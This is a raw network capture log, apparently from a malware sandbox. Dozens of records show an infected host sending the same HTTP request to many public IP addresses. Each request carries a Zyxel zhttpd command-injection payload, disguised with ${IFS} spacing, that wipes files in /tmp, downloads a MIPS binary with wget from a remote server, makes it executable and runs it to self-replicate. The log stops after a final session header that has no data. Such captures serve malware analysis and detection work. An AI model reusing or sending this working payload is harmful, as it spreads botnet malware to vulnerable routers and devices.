                                                Jan 28, 2024 10:16:31.906714916 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5977192.168.2.2338138221.196.10.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.906733990 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5978192.168.2.2339788175.203.224.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.906771898 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5979192.168.2.2359660101.25.153.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.906799078 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5980192.168.2.2350568146.140.161.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.906836033 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5981192.168.2.234411894.0.226.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.906847954 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5982192.168.2.2355962149.137.76.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.906877041 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5983192.168.2.2350244209.10.7.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.906919956 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5984192.168.2.233764017.102.207.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.906955004 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5985192.168.2.2334430101.87.9.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.906996965 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5986192.168.2.2343822165.232.157.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.907018900 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5987192.168.2.2352226173.59.203.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.907040119 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5988192.168.2.2359850147.73.205.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.907073975 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5989192.168.2.2357648140.73.213.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.907103062 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5990192.168.2.2345676114.234.135.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.907110929 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5991192.168.2.2345538201.246.137.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.907161951 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5992192.168.2.2357336139.81.128.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.907175064 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5993192.168.2.234287092.222.153.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.907186031 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5994192.168.2.2342294212.140.124.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.907227039 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5995192.168.2.2340058135.135.19.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.907248974 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5996192.168.2.2335130147.123.170.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.907275915 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5997192.168.2.2347588151.144.210.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.907319069 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5998192.168.2.235863469.93.196.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.907346964 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5999192.168.2.2340884132.72.221.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.907371044 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6000192.168.2.234901675.165.111.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.907378912 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6001192.168.2.2338692122.45.116.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.907414913 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6002192.168.2.2341926144.8.94.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.907449961 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6003192.168.2.2337178157.213.76.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.907500029 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6004192.168.2.234740691.3.41.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.907511950 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6005192.168.2.2354476212.213.14.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.907533884 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6006192.168.2.235199835.103.161.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.907556057 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6007192.168.2.234023254.112.76.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.907568932 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6008192.168.2.234937861.101.47.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.907607079 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6009192.168.2.2355232192.54.76.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.907638073 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6010192.168.2.2344972217.193.167.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.907665968 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6011192.168.2.2337656200.252.45.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.907681942 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6012192.168.2.233457844.167.69.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.907732964 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6013192.168.2.23553625.202.220.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.907772064 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6014192.168.2.2347664126.78.237.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.907777071 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6015192.168.2.2338628205.19.76.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.907809019 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6016192.168.2.2340520150.139.182.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.907866955 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6017192.168.2.235649620.194.6.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.907895088 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6018192.168.2.234228420.204.18.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.907915115 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6019192.168.2.2357702110.75.55.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.907963037 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6020192.168.2.2334344130.64.82.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.907979965 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6021192.168.2.2342204178.71.79.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.908011913 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6022192.168.2.23402468.176.228.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.908035040 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6023192.168.2.2334092187.190.208.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.908035040 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6024192.168.2.2348240173.130.158.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.908098936 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6025192.168.2.236018271.35.163.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.908114910 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6026192.168.2.2354470150.90.64.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.908155918 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6027192.168.2.2334342204.135.0.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.908179998 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6028192.168.2.233689866.242.157.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.908212900 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6029192.168.2.234103858.168.234.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.908233881 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6030192.168.2.2352130194.61.4.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.908248901 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6031192.168.2.2344178152.83.22.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.908293962 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6032192.168.2.2357894137.197.61.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.908312082 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6033192.168.2.233702425.230.245.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.908365965 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6034192.168.2.2332840151.43.181.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.908385038 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6035192.168.2.236012040.84.224.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.908409119 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6036192.168.2.2332824158.1.225.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.908431053 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6037192.168.2.2350568155.179.65.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.908451080 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6038192.168.2.235807681.177.214.247443
                                                TimestampBytes transferredDirectionData
